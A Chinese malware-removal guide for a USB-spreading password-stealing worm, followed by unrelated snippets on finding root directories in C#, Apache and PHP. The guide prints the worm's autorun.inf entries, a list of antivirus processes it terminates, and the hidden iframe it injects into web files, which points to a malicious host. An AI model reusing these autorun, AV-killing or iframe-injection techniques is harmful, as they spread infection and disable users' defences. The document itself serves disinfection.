各分区根目录释放shell.exe,autorun.inf 的病毒清除方法

病毒名:Trojan-psw.Win32.Magania.os 卡巴
  Worm.Win32.Delf.ysa 瑞星 
  文件变化: 
  释放文件
  C:\WINDOWS\system32\Shell.exe
  C:\WINDOWS\system32\Shell.pci
  C:\pass.dic

  各分区根目录释放
  shell.exe
  autorun.inf

  autorun.inf内容
  [Autorun]
  OPEN=Shell.exe
  shellexecute=Shell.exe
  shell\Auto\command=Shell.exe

  修改注册表:
  创建启动项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <Shell.exe><C:\WINDOWS\system32\Shell.exe>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
为0 
  破坏显示隐藏文件
  其他行为

  停止server服务
  查找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密码防盗专家 综合版 注册表项
  找到则将其删除

  终止以下进程或关闭窗口
KVXP.KXP
KVMonXP.KXP
RavMon.exe
RavMonClass
TfLockDownMain
ZoneAlarm
ZAFrameWnd
VirusScan
Symantec AntiVirus
Duba
Wrapped gift Killer
IceSword
pjf(ustc)

EGHOST.EXE
PasswordGuard.exe
MAILMON.EXE
KAVPFW.EXE
IPARMOR.EXE
_AVP32.EXE..
_AVPCC.EXE
_AVPM.EXEAVP32.EXE
AVPCC.EXE
AVPM.EXE
AVP.EXE
NAVAPW32.EXE
NAVW32.EXE
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

  遍历非系统分区的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP文件
感染.ASP
.ASPX
.COM
.HTM
.HTML
.JSP
.PHP
文件
在其后面加入 <iframe src=http://www.photoyahoo5.com                                           width=0 height=0></iframe>的代码

  感染.exe .com .pif .exe
  在其头部加入64516字节的内容 属于文件头寄生感染

  连接网络下载hXXp://www.photoyahoo5.com/tools/01.exe到C盘根目录下

  清除方法:
  1.安全模式下:(重启系统长按F8直到出现提示,然后选择进入安全模式)

  把下面的 代码拷入记事本中然后另存为1.reg文件
 Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

  双击1.reg把这个注册表项导入

  双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定

  然后删除
 C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

  以及各个分区下面的shell.exe
  autorun.inf

  2.删除病毒启动项(开始菜单-运行-输入“msconfig”-启动-删除带Shell的项)
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

  3.利用反病毒软件修复受感染的exe文件
  4.修复被修改的网页文件

(0)

相关推荐

  • C#取得Web程序和非Web程序的根目录的N种取法总结

    非Web程序 1.AppDomain.CurrentDomain.BaseDirectory 2.Environment.CurrentDirectory 3.HttpRuntime.BinDirectory The path to the current application's/bin directory. Web程序 HttpCurrent.Context.Server.Mappath();

  • Apache 文件根目录设置修改方法 (Document Root)

    在网上查找到的关于修改Apache服务器根目录的资料,对比学习,再此记录 在安装 Apache 时,系统会给定一个缺省的文件根目录. 如果你觉得将网页存在这个缺省目录不方便,觉得应该另外设个目录作为 Apache 文件根目录,你可以修改 Apache 的配置文件 httpd.conf 里有关文件根目录的设置. 假设Apache HTTP Server 的缺省文件根目录 (DocumentRoot) 是: DocumentRoot "C:\Program Files\Apache Software

  • apache访问根目录 配置作用域的相关资料

    我的网站有个功能  比如  www.abc.com  对应的目录是 aaa   还有一个网站目录为 www.123.com  对bbb 但是需要在www.abc.com 上次文件的同事 往 www.123.com 里面也给生成一个同样的 文件. 但是原配设置是有问题的,传布上去. 查找思路: 1.文件权限问题2.访问所属者 两个都查完了 发现都没问题, 郁闷了,最后想到  网站单独的配置文件的问题,于是打开 www.abc.com 对应的apache 配置文件: 复制代码 代码如下: <Virt

  • asp.net 文件路径之获得虚拟目录的网站的根目录

    string Server.MapPath(string path) 返回与Web服务器上的指定虚拟路径相对应的物理文件路径. Server.MapPath(Request.ServerVariables["PATH_INFO"]) Server.MapPath("/") Server.MapPath("") Server.MapPath(".") Server.MapPath("../") Server.

  • input file获得文件根目录简单实现

    其实问题很简单 index.html 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <

  • PHP 得到根目录的 __FILE__ 常量

    1.PHP 的 __FILE__ 常量(如何得到根目录) dirname(__FILE___) 函数返回的是脚本所在在的路径. 比如文件 b.php 包含如下内容: $basedir = dirname(__FILE__); ?> 如果b.php被其他目录里的a.php文件require 或者 include 去引用的话. 变量$basedir 的内容还是b.php所在的那个文件夹的路径. 而不是变成a.php文件所在的目录. dirname(__FILE__) 一般会返回文件所的当前目录到系统

  • iis ftp 多用户隔离实现方法(根目录)

    首先需要取消"站点属性/允许匿名连接",如图1. 接着进入"计算机管理/本地用户和组",新建立一个组,这里建立为FTPuser,然后新建立一个用户FTP01,然后修改FTP01的属性,把它加入FTPuser组,去掉系统默认的users组.在NTFS格式分区下(这里为d盘)创建文件夹FTP01和FTP02,然后设置安全权限,如图2. 同样设置文件夹FTP02的权限为FTP02完全控制,当然这里可以按照实际情况分配不同用户不同的权限.回到IIS管理器,选择一个FTP站点

  • IE:快速到达根目录

    如果我们正在用IE5浏览网页的时候,突然想要到硬盘上查资料,这可怎么办呢?把浏览器最小化,再返回到资源管理器中查找,这是最常规的做法了.但是有没有想过有更简单的方法呢?跟着学就是了. 其实方法真的很简单啊.只要在地址栏中输入"\",再敲回车,就可以到达硬盘的根目录了. 如果又要返回原来浏览的网页,只要点击"后退"就可以了.

  • c#取得控制台应用程序根目录

    1.取得控制台应用程序的根目录方法 方法1.Environment.CurrentDirectory 取得或设置当前工作目录的完整限定路径方法2.AppDomain.CurrentDomain.BaseDirectory 获取基目录,它由程序集冲突解决程序用来探测程序集 2.取得Web应用程序的根目录方法 方法1.HttpRuntime.AppDomainAppPath.ToString();//获取承载在当前应用程序域中的应用程序的应用程序目录的物理驱动器路径.用于App_Data中获取方法2

  • php中定义网站根目录的常用方法

    复制代码 代码如下: define('BASE_PATH',str_replace('\\','/',realpath(dirname(__FILE__).'/../')));

随机推荐